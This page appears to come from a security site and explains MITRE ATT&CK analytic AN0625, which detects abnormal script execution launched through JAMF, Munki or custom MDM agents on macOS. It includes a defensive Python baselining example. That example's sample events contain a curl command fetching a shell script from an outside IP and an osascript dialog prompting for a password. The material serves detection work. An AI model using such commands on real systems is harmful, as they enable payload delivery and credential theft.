AN0625: Analytic 0625
Detects script or binary execution initiated via JAMF, Munki, or custom MDM agents outside of baseline, or JAMF launching new Terminal or osascript processes from remote command payloads.
Analyst context for executives and security teams
AN0625 is a macOS-focused detection analytic for spotting script or binary execution launched through JAMF, Munki, or custom MDM agents when that activity falls outside the organization’s normal baseline. This matters because MDM and software management tooling is trusted infrastructure: if remote commands or management agents start unusual Terminal, osascript, script, or binary activity, the event may look administrative unless teams have a known-good baseline and sufficient endpoint telemetry.
Executive priority
Treat this as a control-validation issue for macOS fleet governance. Leaders should ask whether MDM-driven execution is logged, baselined, change-controlled, and reviewable during an incident. The business risk is not that JAMF or Munki are inherently malicious, but that a trusted management channel lets abnormal remote execution blend into routine administration unless security teams can tell approved maintenance apart from it.
Technical view
For SOC and detection engineering teams, validate visibility into macOS process creation where the parent or initiator is JAMF, Munki, or a custom MDM agent. In practice that means the jamf binary (/usr/local/jamf/bin/jamf), Munki's managedsoftwareupdate (/usr/local/munki/managedsoftwareupdate), and whatever custom agent binaries the organization deploys, and it means following the parent chain rather than only the immediate parent: JAMF policy scripts run under the interpreter named in their shebang, so a payload's direct parent is typically sh, bash, or zsh rather than jamf itself. Focus on execution that is outside the normal software deployment or administration baseline, especially JAMF-initiated launches of Terminal or osascript from remote command payloads. Because ATT&CK provides no detailed detection logic for this analytic, local baselining is essential: compare process names, parent-child relationships, command lines where available, executing user or service context, host groups, timing, and change-ticket context.
Likely telemetry
- macOS process creation events with parent-child process relationships
- Command-line or script execution metadata where available
- MDM/JAMF/Munki remote command and policy execution logs
- Endpoint security or EDR telemetry from managed macOS hosts
- Administrative audit logs for MDM console activity and policy changes
Detection direction
- Build a baseline of expected JAMF, Munki, and custom MDM agent execution by host group, policy, package, administrator workflow, and maintenance window.
- Alert on unusual child processes from MDM agents, particularly Terminal or osascript when launched by JAMF remote command payloads, while tuning known administrative workflows.
- Correlate endpoint process telemetry with MDM policy execution and administrator audit logs to separate approved software management from abnormal execution.
- Review false positives from legitimate helpdesk actions, software deployment tasks, emergency maintenance, and scripted remediation jobs.
- Identify blind spots where macOS command-line capture, MDM audit logs, or custom agent logs are incomplete or not centrally retained.
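The baseline-then-deviate logic described in the steps above, as an added example that is not part of the ATT&CK object or of this page's analysis. It runs over constructed process events shaped like normalized EDR or Endpoint Security exec telemetry; the field names (host_group, ppid, user, ts, cmdline), the custom agent path /Library/ExampleCorp/bin/mdm-agent, the host groups, and the change-ticket windows are assumptions made for illustration. The jamf and managedsoftwareupdate paths are the real agent binaries.

```python
"""Baseline-then-deviate scoring for macOS MDM-agent child processes (added example)."""
from dataclasses import dataclass
from typing import Optional

# Real agent binaries for JAMF and Munki; the custom agent path is an assumption.
MDM_AGENTS = {
    "/usr/local/jamf/bin/jamf": "jamf",
    "/usr/local/munki/managedsoftwareupdate": "munki",
    "/Library/ExampleCorp/bin/mdm-agent": "custom",
}
HIGH_RISK_CHILDREN = {"osascript", "Terminal"}   # the children the analytic singles out
SHELL_HOPS = {"sh", "bash", "zsh"}                # jamf runs policy scripts through a shell


@dataclass(frozen=True)
class ProcEvent:
    host: str
    host_group: str
    pid: int
    ppid: int
    path: str
    user: str
    ts: int                 # epoch seconds
    cmdline: str = ""       # often missing in macOS telemetry, so keep it optional

    @property
    def name(self) -> str:
        return self.path.rsplit("/", 1)[-1]


def index_by_pid(events):
    return {(e.host, e.pid): e for e in events}


def mdm_initiator(ev, by_pid, max_hops=4) -> Optional[str]:
    """Return the MDM agent that initiated ev, looking through shell hops so that
    jamf -> sh -> osascript is still attributed to jamf; None if not MDM-initiated."""
    cur = ev
    for _ in range(max_hops):
        parent = by_pid.get((cur.host, cur.ppid))
        if parent is None:
            return None
        if parent.path in MDM_AGENTS:
            return MDM_AGENTS[parent.path]
        if parent.name not in SHELL_HOPS:
            return None
        cur = parent
    return None


def build_baseline(events) -> set:
    """Known-good (host_group, agent, child, user) tuples from a reviewed period."""
    by_pid = index_by_pid(events)
    baseline = set()
    for ev in events:
        agent = mdm_initiator(ev, by_pid)
        if agent is not None:
            baseline.add((ev.host_group, agent, ev.name, ev.user))
    return baseline


def evaluate(events, baseline, approved_windows=()):
    """Score MDM-initiated executions. approved_windows holds (host_group, start_ts,
    end_ts, ticket) from change control; a match downgrades severity instead of
    suppressing the finding, so it still reaches review."""
    by_pid = index_by_pid(events)
    findings = []
    for ev in events:
        agent = mdm_initiator(ev, by_pid)
        if agent is None:
            continue                # not MDM-initiated: out of scope for this analytic
        if agent == "jamf" and ev.name in HIGH_RISK_CHILDREN:
            severity = "high"       # never baselined away; a poisoned baseline must not hide it
        elif (ev.host_group, agent, ev.name, ev.user) not in baseline:
            severity = "medium"
        else:
            continue                # matches an approved, previously reviewed shape
        ticket = next((w[3] for w in approved_windows
                       if w[0] == ev.host_group and w[1] <= ev.ts <= w[2]), None)
        if ticket is not None:
            severity = {"high": "medium", "medium": "low"}[severity]
        findings.append({"host": ev.host, "agent": agent, "child": ev.name, "user": ev.user,
                         "severity": severity, "ticket": ticket, "cmdline": ev.cmdline})
    return findings


# Constructed known-good period: jamf installs a package via its policy shell on eng
# hosts, Munki runs the installer on finance hosts.
BASELINE_EVENTS = [
    ProcEvent("eng-01", "eng", 100, 1, "/usr/local/jamf/bin/jamf", "root", 1000),
    ProcEvent("eng-01", "eng", 101, 100, "/bin/sh", "root", 1001),
    ProcEvent("eng-01", "eng", 102, 101, "/usr/sbin/installer", "root", 1002),
    ProcEvent("fin-01", "finance", 200, 1, "/usr/local/munki/managedsoftwareupdate", "root", 1000),
    ProcEvent("fin-01", "finance", 201, 200, "/usr/sbin/installer", "root", 1001),
]

# Constructed detection batch: one routine install, one jamf remote command spawning
# osascript, one custom agent fetching a file during an approved window, and one
# user-launched osascript that is not MDM-initiated at all.
NEW_EVENTS = [
    ProcEvent("eng-02", "eng", 300, 1, "/usr/local/jamf/bin/jamf", "root", 5000),
    ProcEvent("eng-02", "eng", 301, 300, "/bin/sh", "root", 5001),
    ProcEvent("eng-02", "eng", 302, 301, "/usr/sbin/installer", "root", 5002),
    ProcEvent("eng-03", "eng", 400, 1, "/usr/local/jamf/bin/jamf", "root", 6000),
    ProcEvent("eng-03", "eng", 401, 400, "/bin/sh", "root", 6001),
    ProcEvent("eng-03", "eng", 402, 401, "/usr/bin/osascript", "root", 6002,
              "osascript -e 'display dialog \"Enter your password\"'"),
    ProcEvent("fin-02", "finance", 500, 1, "/Library/ExampleCorp/bin/mdm-agent", "root", 7000),
    ProcEvent("fin-02", "finance", 501, 500, "/usr/bin/curl", "root", 7001,
              "curl -fsSL http://203.0.113.5/s.sh -o /tmp/s.sh"),
    ProcEvent("eng-03", "eng", 600, 1,
              "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", "alice", 8000),
    ProcEvent("eng-03", "eng", 601, 600, "/usr/bin/osascript", "alice", 8001),
]
APPROVED_WINDOWS = (("eng", 5000, 5100, "CHG-1234"), ("finance", 6900, 7100, "CHG-4421"))


def run_example():
    return evaluate(NEW_EVENTS, build_baseline(BASELINE_EVENTS), APPROVED_WINDOWS)


if __name__ == "__main__":
    for f in run_example():
        print(f["severity"], f["host"], f["agent"], "->", f["child"], f["ticket"], f["cmdline"])
```

Two design choices matter here. The ancestry walk stops at the first non-shell parent, so an osascript launched from a user's Terminal session is never attributed to an MDM agent, while jamf -> sh -> osascript is. And the JAMF-to-Terminal/osascript case is scored high regardless of the baseline: if an attacker already had MDM access while the baseline was being collected, a pure baseline approach would quietly accept the behaviour, so the analytic's named high-signal pairs are exempted from tuning and only downgraded by a matching change ticket.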
Mitigation priorities
- Enforce change control and approval for remote command, script, and package execution through macOS management tooling.
- Limit MDM administrative privileges to required personnel and roles, and review access periodically.
- Maintain documented baselines for expected JAMF, Munki, and custom MDM agent behavior across different macOS device groups.
- Centralize and retain MDM audit logs and macOS endpoint process telemetry for investigation and compliance evidence.
- Review custom MDM agents and scripts for ownership, signing or integrity controls where applicable, and operational necessity.
Analyst notes and limits
This object is a detection analytic, not a technique description. Its value is strongest for organizations with managed macOS fleets using JAMF, Munki, or custom MDM agents. The key defensive decision is whether trusted management tooling is observable enough to support incident triage and whether abnormal remote execution can be separated from routine administration.
ATT&CK supplies no official detection logic, no tactics, and no relationship context for this object. Conclusions must therefore remain limited to the provided macOS platform and the named management tools and behaviors. Local environment baselines, logging configuration, and administrative processes are required to determine practical coverage.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 7591e731c887… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] mitre-attack: AN0625
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.